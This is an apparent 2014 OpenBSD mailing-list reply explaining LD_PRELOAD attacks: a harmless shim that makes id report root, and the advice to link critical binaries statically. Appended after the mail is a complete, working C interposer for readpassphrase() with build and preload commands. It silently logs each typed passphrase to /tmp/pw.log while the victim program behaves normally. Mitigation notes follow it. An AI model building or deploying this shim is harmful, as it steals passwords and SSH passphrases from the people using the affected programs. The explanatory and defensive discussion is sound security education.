2014-02-17 13:15 GMT+01:00 <[email protected]>:
> On 16. februar 2014 at 10:11 PM, "Daniel Cegiełka" <[email protected]> wrote:
>
> > try this:
> >
> > --- cat id0.c ---
> > /* every uid/gid query now answers 0, i.e. root */
> > int getuid(){return 0;}
> > int geteuid(){return 0;}
> > int getgid(){return 0;}
> > int getegid(){return 0;}
> > --- end cut ---
> >
> > # shell (as normal user):
> > id -un
> > cc -shared id0.c -o id0
> > LD_PRELOAD=./id0 sh
> > id -un
>
> What does that do?
>
> O.D.
Nothing (it's safe to self-test, so have fun). id (or whoami) thinks it calls functions from libc, but it really calls functions that are loaded via LD_PRELOAD. These fake functions return 0, so id (whoami) thinks that you are root.

Attacks with LD_PRELOAD are very old and can be performed on any OS where you have dynamic linking (Linux, *BSD etc.), so yes, OpenBSD is "vulnerable" to this type of stuff. The real attack can be done by loading e.g. a fake readpassphrase() function.

http://www.openbsd.org/cgi-bin/man.cgi?query=readpassphrase&sektion=3

readpassphrase() is used e.g. in the /usr/libexec/auth/login_* stuff, signify, ssh, ssh-keygen, ssh-agent, nc, ftp etc. Each of these programs is dynamically linked, so they are LD_PRELOAD sensitive. If an attacker __can__ LD_PRELOAD a false readpassphrase(), he will e.g. be able to get to know your password.

Solution: static linking of critical binaries.

I hope that my explanation was helpful.

best regards,
Daniel
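The fake readpassphrase() that Daniel describes, written out as an added example (this is not code from the mail, from OpenBSD or from any of the programs named above). The shim interposes readpassphrase(3), keeps a copy of whatever the user typed, and then forwards to the real implementation found with dlsym(RTLD_NEXT), so the victim program behaves exactly as before. The log path /tmp/pw.log and the helper names stash_passphrase() and captured_passphrase() are illustrative choices; the hand-written prototype matches the one in readpassphrase(3). On OpenBSD readpassphrase() is in libc; on Linux it comes from libbsd, so the shim only has something to forward to there if the victim links libbsd.

```c
/* Added example: LD_PRELOAD shim for readpassphrase(3).
 * Build as a shared object:   cc -shared -fPIC pwshim.c -o pwshim.so
 * Use against a dynamic victim: LD_PRELOAD=./pwshim.so ./victim
 * A statically linked victim never loads ld.so, so the shim is never mapped. */
#define _GNU_SOURCE          /* RTLD_NEXT on glibc; harmless elsewhere */
#include <dlfcn.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Prototype from readpassphrase(3), declared by hand so this file builds
 * even on systems that have no <readpassphrase.h>. */
char *readpassphrase(const char *prompt, char *buf, size_t bufsiz, int flags);

typedef char *(*readpassphrase_fn)(const char *, char *, size_t, int);

/* Last passphrase seen by the shim, kept in-process so it can be inspected. */
static char captured[1024];

/* Record a passphrase: keep a bounded copy in memory and append it to a
 * log file the attacker can collect later.  Returns the number of bytes kept.
 * /tmp/pw.log is a constructed path for the example; a write failure is
 * ignored so the victim never sees an error it would not normally see. */
size_t stash_passphrase(const char *pass)
{
    size_t n = strlen(pass);
    if (n >= sizeof captured)
        n = sizeof captured - 1;
    memcpy(captured, pass, n);
    captured[n] = '\0';

    FILE *log = fopen("/tmp/pw.log", "a");
    if (log != NULL) {
        fprintf(log, "%s\n", captured);
        fclose(log);
    }
    return n;
}

/* What the shim has captured so far (empty string before the first call). */
const char *captured_passphrase(void)
{
    return captured;
}

/* The interposed symbol.  Because the preloaded object is searched before
 * libc, the victim's call lands here; RTLD_NEXT finds the implementation
 * that would have been used otherwise. */
char *readpassphrase(const char *prompt, char *buf, size_t bufsiz, int flags)
{
    readpassphrase_fn real = (readpassphrase_fn)dlsym(RTLD_NEXT, "readpassphrase");
    if (real == NULL)
        return NULL;                 /* nothing behind us: fail like an I/O error */

    char *ret = real(prompt, buf, bufsiz, flags);
    if (ret != NULL)
        stash_passphrase(ret);       /* copy the secret, then hand it back unchanged */
    return ret;
}
```

Two checks worth knowing when reasoning about the mitigation: a program cannot defend itself by inspecting LD_PRELOAD in its own environment, because the preloaded object runs code before main() and can alter the environment, and the runtime linker already ignores LD_PRELOAD for set-user-ID and set-group-ID executables; for everything else the only robust answer is the one Daniel gives, a statically linked binary that never maps ld.so at all.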

